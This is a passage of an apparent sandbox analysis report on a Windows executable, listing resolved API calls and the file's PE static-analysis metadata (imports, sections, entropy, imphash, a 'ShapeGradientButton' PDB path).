3337. "wbemcore.dll.Reinitialize",
3338. "wbemsvc.dll.DllGetClassObject",
3339. "wbemsvc.dll.DllCanUnloadNow",
3340. "authz.dll.AuthzInitializeContextFromToken",
3341. "authz.dll.AuthzInitializeObjectAccessAuditEvent2",
3342. "authz.dll.AuthzAccessCheck",
3343. "authz.dll.AuthzFreeAuditEvent",
3344. "authz.dll.AuthzFreeContext",
3345. "authz.dll.AuthzInitializeResourceManager",
3346. "authz.dll.AuthzFreeResourceManager",
3347. "rpcrt4.dll.RpcBindingCreateW",
3348. "rpcrt4.dll.RpcBindingBind",
3349. "rpcrt4.dll.I_RpcMapWin32Status",
3350. "advapi32.dll.EventRegister",
3351. "advapi32.dll.EventUnregister",
3352. "advapi32.dll.EventWrite",
3353. "kernel32.dll.RegSetValueExW",
3354. "kernel32.dll.RegQueryValueExW",
3355. "wmisvc.dll.IsImproperShutdownDetected",
3356. "wevtapi.dll.EvtRender",
3357. "wevtapi.dll.EvtNext",
3358. "wevtapi.dll.EvtClose",
3359. "wevtapi.dll.EvtQuery",
3360. "wevtapi.dll.EvtCreateRenderContext",
3361. "rpcrt4.dll.RpcBindingSetOption",
3362. "ole32.dll.CoCreateFreeThreadedMarshaler",
3363. "ole32.dll.CreateStreamOnHGlobal",
3364. "kernelbase.dll.InitializeAcl",
3365. "kernelbase.dll.AddAce",
3366. "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
3367. "kernel32.dll.IsThreadAFiber",
3368. "kernel32.dll.OpenProcessToken",
3369. "kernelbase.dll.GetTokenInformation",
3370. "kernelbase.dll.DuplicateTokenEx",
3371. "kernelbase.dll.AdjustTokenPrivileges",
3372. "kernelbase.dll.AllocateAndInitializeSid",
3373. "kernelbase.dll.CheckTokenMembership",
3374. "oleaut32.dll.#285",
3375. "kernel32.dll.SetThreadToken",
3376. "ole32.dll.CLSIDFromString",
3377. "oleaut32.dll.#17",
3378. "oleaut32.dll.#25",
3379. "oleaut32.dll.#286",
3380. "authz.dll.AuthzInitializeContextFromSid",
3381. "ole32.dll.CoGetCallContext",
3382. "ole32.dll.CoImpersonateClient",
3383. "ole32.dll.CoRevertToSelf",
3384. "oleaut32.dll.#8",
3385. "ole32.dll.CoSwitchCallContext",
3386. "ntdll.dll.EtwUnregisterTraceGuids",
3387. "shlwapi.dll.PathIsDirectoryW",
3388. "advapi32.dll.RegNotifyChangeKeyValue",
3389. "ole32.dll.NdrOleInitializeExtension",
3390. "ole32.dll.CLSIDFromOle1Class",
3391. "clbcatq.dll.GetCatalogObject",
3392. "clbcatq.dll.GetCatalogObject2",
3393. "shlwapi.dll.PathIsPrefixW",
3394. "xmllite.dll.CreateXmlReader",
3395. "kernel32.dll.WerRegisterMemoryBlock"
3396. ]
3397.  
3398. [*] Static Analysis: {
3399. "pe": {
3400. "peid_signatures": null,
3401. "imports": [
3402. {
3403. "imports": [
3404. {
3405. "name": "VirtualAlloc",
3406. "address": "0x40505c"
3407. },
3408. {
3409. "name": "InterlockedCompareExchange",
3410. "address": "0x405060"
3411. },
3412. {
3413. "name": "GetStartupInfoA",
3414. "address": "0x405064"
3415. },
3416. {
3417. "name": "TerminateProcess",
3418. "address": "0x405068"
3419. },
3420. {
3421. "name": "GetCurrentProcess",
3422. "address": "0x40506c"
3423. },
3424. {
3425. "name": "UnhandledExceptionFilter",
3426. "address": "0x405070"
3427. },
3428. {
3429. "name": "SetUnhandledExceptionFilter",
3430. "address": "0x405074"
3431. },
3432. {
3433. "name": "IsDebuggerPresent",
3434. "address": "0x405078"
3435. },
3436. {
3437. "name": "QueryPerformanceCounter",
3438. "address": "0x40507c"
3439. },
3440. {
3441. "name": "GetTickCount",
3442. "address": "0x405080"
3443. },
3444. {
3445. "name": "GetCurrentThreadId",
3446. "address": "0x405084"
3447. },
3448. {
3449. "name": "GetCurrentProcessId",
3450. "address": "0x405088"
3451. },
3452. {
3453. "name": "GetCurrentDirectoryA",
3454. "address": "0x40508c"
3455. },
3456. {
3457. "name": "GetModuleHandleA",
3458. "address": "0x405090"
3459. },
3460. {
3461. "name": "Sleep",
3462. "address": "0x405094"
3463. },
3464. {
3465. "name": "LoadLibraryW",
3466. "address": "0x405098"
3467. },
3468. {
3469. "name": "GetProcAddress",
3470. "address": "0x40509c"
3471. },
3472. {
3473. "name": "CreateFileMappingW",
3474. "address": "0x4050a0"
3475. },
3476. {
3477. "name": "MapViewOfFile",
3478. "address": "0x4050a4"
3479. },
3480. {
3481. "name": "InterlockedExchange",
3482. "address": "0x4050a8"
3483. },
3484. {
3485. "name": "GetSystemTimeAsFileTime",
3486. "address": "0x4050ac"
3487. }
3488. ],
3489. "dll": "KERNEL32.dll"
3490. },
3491. {
3492. "imports": [
3493. {
3494. "name": "LoadImageA",
3495. "address": "0x405174"
3496. },
3497. {
3498. "name": "GetDC",
3499. "address": "0x405178"
3500. },
3501. {
3502. "name": "UpdateWindow",
3503. "address": "0x40517c"
3504. },
3505. {
3506. "name": "SetWindowRgn",
3507. "address": "0x405180"
3508. },
3509. {
3510. "name": "MoveWindow",
3511. "address": "0x405184"
3512. },
3513. {
3514. "name": "GetWindowRgn",
3515. "address": "0x405188"
3516. },
3517. {
3518. "name": "DrawIconEx",
3519. "address": "0x40518c"
3520. },
3521. {
3522. "name": "GetClientRect",
3523. "address": "0x405190"
3524. },
3525. {
3526. "name": "GetWindowTextA",
3527. "address": "0x405194"
3528. },
3529. {
3530. "name": "DestroyIcon",
3531. "address": "0x405198"
3532. },
3533. {
3534. "name": "EndPaint",
3535. "address": "0x40519c"
3536. },
3537. {
3538. "name": "BeginPaint",
3539. "address": "0x4051a0"
3540. },
3541. {
3542. "name": "SetCapture",
3543. "address": "0x4051a4"
3544. },
3545. {
3546. "name": "SendMessageA",
3547. "address": "0x4051a8"
3548. },
3549. {
3550. "name": "GetParent",
3551. "address": "0x4051ac"
3552. },
3553. {
3554. "name": "GetWindowLongA",
3555. "address": "0x4051b0"
3556. },
3557. {
3558. "name": "ReleaseCapture",
3559. "address": "0x4051b4"
3560. },
3561. {
3562. "name": "GetWindowRect",
3563. "address": "0x4051b8"
3564. },
3565. {
3566. "name": "SetWindowLongA",
3567. "address": "0x4051bc"
3568. },
3569. {
3570. "name": "CreateDialogParamA",
3571. "address": "0x4051c0"
3572. },
3573. {
3574. "name": "GetDlgItem",
3575. "address": "0x4051c4"
3576. },
3577. {
3578. "name": "ReleaseDC",
3579. "address": "0x4051c8"
3580. },
3581. {
3582. "name": "PostQuitMessage",
3583. "address": "0x4051cc"
3584. },
3585. {
3586. "name": "MessageBoxA",
3587. "address": "0x4051d0"
3588. },
3589. {
3590. "name": "DefWindowProcA",
3591. "address": "0x4051d4"
3592. },
3593. {
3594. "name": "LoadCursorA",
3595. "address": "0x4051d8"
3596. },
3597. {
3598. "name": "LoadIconA",
3599. "address": "0x4051dc"
3600. },
3601. {
3602. "name": "RegisterClassA",
3603. "address": "0x4051e0"
3604. },
3605. {
3606. "name": "CreateWindowExA",
3607. "address": "0x4051e4"
3608. },
3609. {
3610. "name": "ShowWindow",
3611. "address": "0x4051e8"
3612. },
3613. {
3614. "name": "GetMessageA",
3615. "address": "0x4051ec"
3616. },
3617. {
3618. "name": "TranslateMessage",
3619. "address": "0x4051f0"
3620. },
3621. {
3622. "name": "DispatchMessageA",
3623. "address": "0x4051f4"
3624. }
3625. ],
3626. "dll": "USER32.dll"
3627. },
3628. {
3629. "imports": [
3630. {
3631. "name": "CreateCompatibleBitmap",
3632. "address": "0x405000"
3633. },
3634. {
3635. "name": "GetRegionData",
3636. "address": "0x405004"
3637. },
3638. {
3639. "name": "DeleteDC",
3640. "address": "0x405008"
3641. },
3642. {
3643. "name": "DeleteObject",
3644. "address": "0x40500c"
3645. },
3646. {
3647. "name": "CombineRgn",
3648. "address": "0x405010"
3649. },
3650. {
3651. "name": "CreateRectRgn",
3652. "address": "0x405014"
3653. },
3654. {
3655. "name": "GetPixel",
3656. "address": "0x405018"
3657. },
3658. {
3659. "name": "SelectObject",
3660. "address": "0x40501c"
3661. },
3662. {
3663. "name": "SaveDC",
3664. "address": "0x405020"
3665. },
3666. {
3667. "name": "GetObjectA",
3668. "address": "0x405024"
3669. },
3670. {
3671. "name": "CreateCompatibleDC",
3672. "address": "0x405028"
3673. },
3674. {
3675. "name": "GetRgnBox",
3676. "address": "0x40502c"
3677. },
3678. {
3679. "name": "CreateRectRgnIndirect",
3680. "address": "0x405030"
3681. },
3682. {
3683. "name": "BitBlt",
3684. "address": "0x405034"
3685. },
3686. {
3687. "name": "FrameRgn",
3688. "address": "0x405038"
3689. },
3690. {
3691. "name": "TextOutA",
3692. "address": "0x40503c"
3693. },
3694. {
3695. "name": "SetTextColor",
3696. "address": "0x405040"
3697. },
3698. {
3699. "name": "GetTextExtentPoint32A",
3700. "address": "0x405044"
3701. },
3702. {
3703. "name": "SetBkMode",
3704. "address": "0x405048"
3705. },
3706. {
3707. "name": "CreateFontA",
3708. "address": "0x40504c"
3709. },
3710. {
3711. "name": "PtInRegion",
3712. "address": "0x405050"
3713. },
3714. {
3715. "name": "GetStockObject",
3716. "address": "0x405054"
3717. }
3718. ],
3719. "dll": "GDI32.dll"
3720. },
3721. {
3722. "imports": [
3723. {
3724. "name": "??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ",
3725. "address": "0x4050b4"
3726. },
3727. {
3728. "name": "??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z",
3729. "address": "0x4050b8"
3730. },
3731. {
3732. "name": "??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z",
3733. "address": "0x4050bc"
3734. },
3735. {
3736. "name": "??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z",
3737. "address": "0x4050c0"
3738. },
3739. {
3740. "name": "??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ",
3741. "address": "0x4050c4"
3742. },
3743. {
3744. "name": "?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ",
3745. "address": "0x4050c8"
3746. },
3747. {
3748. "name": "?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ",
3749. "address": "0x4050cc"
3750. }
3751. ],
3752. "dll": "MSVCP90.dll"
3753. },
3754. {
3755. "imports": [
3756. {
3757. "name": "__p__fmode",
3758. "address": "0x4050d4"
3759. },
3760. {
3761. "name": "__p__commode",
3762. "address": "0x4050d8"
3763. },
3764. {
3765. "name": "_adjust_fdiv",
3766. "address": "0x4050dc"
3767. },
3768. {
3769. "name": "__setusermatherr",
3770. "address": "0x4050e0"
3771. },
3772. {
3773. "name": "_configthreadlocale",
3774. "address": "0x4050e4"
3775. },
3776. {
3777. "name": "_initterm_e",
3778. "address": "0x4050e8"
3779. },
3780. {
3781. "name": "__set_app_type",
3782. "address": "0x4050ec"
3783. },
3784. {
3785. "name": "_acmdln",
3786. "address": "0x4050f0"
3787. },
3788. {
3789. "name": "exit",
3790. "address": "0x4050f4"
3791. },
3792. {
3793. "name": "_ismbblead",
3794. "address": "0x4050f8"
3795. },
3796. {
3797. "name": "_XcptFilter",
3798. "address": "0x4050fc"
3799. },
3800. {
3801. "name": "_exit",
3802. "address": "0x405100"
3803. },
3804. {
3805. "name": "_cexit",
3806. "address": "0x405104"
3807. },
3808. {
3809. "name": "_crt_debugger_hook",
3810. "address": "0x405108"
3811. },
3812. {
3813. "name": "_except_handler4_common",
3814. "address": "0x40510c"
3815. },
3816. {
3817. "name": "?terminate@@YAXXZ",
3818. "address": "0x405110"
3819. },
3820. {
3821. "name": "?_type_info_dtor_internal_method@type_info@@QAEXXZ",
3822. "address": "0x405114"
3823. },
3824. {
3825. "name": "_invoke_watson",
3826. "address": "0x405118"
3827. },
3828. {
3829. "name": "_controlfp_s",
3830. "address": "0x40511c"
3831. },
3832. {
3833. "name": "_initterm",
3834. "address": "0x405120"
3835. },
3836. {
3837. "name": "malloc",
3838. "address": "0x405124"
3839. },
3840. {
3841. "name": "strlen",
3842. "address": "0x405128"
3843. },
3844. {
3845. "name": "fclose",
3846. "address": "0x40512c"
3847. },
3848. {
3849. "name": "fwrite",
3850. "address": "0x405130"
3851. },
3852. {
3853. "name": "fopen",
3854. "address": "0x405134"
3855. },
3856. {
3857. "name": "free",
3858. "address": "0x405138"
3859. },
3860. {
3861. "name": "??3@YAXPAX@Z",
3862. "address": "0x40513c"
3863. },
3864. {
3865. "name": "strcat",
3866. "address": "0x405140"
3867. },
3868. {
3869. "name": "fread",
3870. "address": "0x405144"
3871. },
3872. {
3873. "name": "feof",
3874. "address": "0x405148"
3875. },
3876. {
3877. "name": "strcmp",
3878. "address": "0x40514c"
3879. },
3880. {
3881. "name": "_unlock",
3882. "address": "0x405150"
3883. },
3884. {
3885. "name": "__dllonexit",
3886. "address": "0x405154"
3887. },
3888. {
3889. "name": "_encode_pointer",
3890. "address": "0x405158"
3891. },
3892. {
3893. "name": "_lock",
3894. "address": "0x40515c"
3895. },
3896. {
3897. "name": "_onexit",
3898. "address": "0x405160"
3899. },
3900. {
3901. "name": "_decode_pointer",
3902. "address": "0x405164"
3903. },
3904. {
3905. "name": "_amsg_exit",
3906. "address": "0x405168"
3907. },
3908. {
3909. "name": "__getmainargs",
3910. "address": "0x40516c"
3911. }
3912. ],
3913. "dll": "MSVCR90.dll"
3914. }
3915. ],
3916. "digital_signers": null,
3917. "exported_dll_name": null,
3918. "actual_checksum": "0x000159b5",
3919. "overlay": null,
3920. "imagebase": "0x00400000",
3921. "reported_checksum": "0x000159b5",
3922. "icon_hash": null,
3923. "entrypoint": "0x00403ceb",
3924. "timestamp": "2019-06-18 14:23:08",
3925. "osversion": "5.0",
3926. "sections": [
3927. {
3928. "name": ".text",
3929. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
3930. "virtual_address": "0x00001000",
3931. "size_of_data": "0x00003400",
3932. "entropy": "5.92",
3933. "raw_address": "0x00000400",
3934. "virtual_size": "0x000033af",
3935. "characteristics_raw": "0x60000020"
3936. },
3937. {
3938. "name": ".rdata",
3939. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
3940. "virtual_address": "0x00005000",
3941. "size_of_data": "0x0000c200",
3942. "entropy": "6.18",
3943. "raw_address": "0x00003800",
3944. "virtual_size": "0x0000c1c8",
3945. "characteristics_raw": "0x40000040"
3946. },
3947. {
3948. "name": ".data",
3949. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
3950. "virtual_address": "0x00012000",
3951. "size_of_data": "0x00000200",
3952. "entropy": "1.51",
3953. "raw_address": "0x0000fa00",
3954. "virtual_size": "0x000004b4",
3955. "characteristics_raw": "0xc0000040"
3956. },
3957. {
3958. "name": ".rsrc",
3959. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
3960. "virtual_address": "0x00013000",
3961. "size_of_data": "0x00000400",
3962. "entropy": "5.19",
3963. "raw_address": "0x0000fc00",
3964. "virtual_size": "0x000002b0",
3965. "characteristics_raw": "0x40000040"
3966. }
3967. ],
3968. "resources": [],
3969. "dirents": [
3970. {
3971. "virtual_address": "0x00000000",
3972. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
3973. "size": "0x00000000"
3974. },
3975. {
3976. "virtual_address": "0x0001057c",
3977. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
3978. "size": "0x00000078"
3979. },
3980. {
3981. "virtual_address": "0x00013000",
3982. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
3983. "size": "0x000002b0"
3984. },
3985. {
3986. "virtual_address": "0x00000000",
3987. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
3988. "size": "0x00000000"
3989. },
3990. {
3991. "virtual_address": "0x00000000",
3992. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
3993. "size": "0x00000000"
3994. },
3995. {
3996. "virtual_address": "0x00000000",
3997. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
3998. "size": "0x00000000"
3999. },
4000. {
4001. "virtual_address": "0x00005230",
4002. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
4003. "size": "0x0000001c"
4004. },
4005. {
4006. "virtual_address": "0x00000000",
4007. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
4008. "size": "0x00000000"
4009. },
4010. {
4011. "virtual_address": "0x00000000",
4012. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
4013. "size": "0x00000000"
4014. },
4015. {
4016. "virtual_address": "0x00000000",
4017. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
4018. "size": "0x00000000"
4019. },
4020. {
4021. "virtual_address": "0x00010330",
4022. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
4023. "size": "0x00000040"
4024. },
4025. {
4026. "virtual_address": "0x00000000",
4027. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
4028. "size": "0x00000000"
4029. },
4030. {
4031. "virtual_address": "0x00005000",
4032. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
4033. "size": "0x000001fc"
4034. },
4035. {
4036. "virtual_address": "0x00000000",
4037. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
4038. "size": "0x00000000"
4039. },
4040. {
4041. "virtual_address": "0x00000000",
4042. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
4043. "size": "0x00000000"
4044. },
4045. {
4046. "virtual_address": "0x00000000",
4047. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
4048. "size": "0x00000000"
4049. }
4050. ],
4051. "exports": [],
4052. "guest_signers": {},
4053. "imphash": "a5e07b9d885d7be2b11371ae68839d0c",
4054. "icon_fuzzy": null,
4055. "icon": null,
4056. "pdbpath": "c:\\Users\\User\\Desktop\\DReY_Shape1667871152003\\Release\\ShapeGradientButton.pdb",
4057. "imported_dll_count": 5,
4058. "versioninfo": []
4059. }
4060. }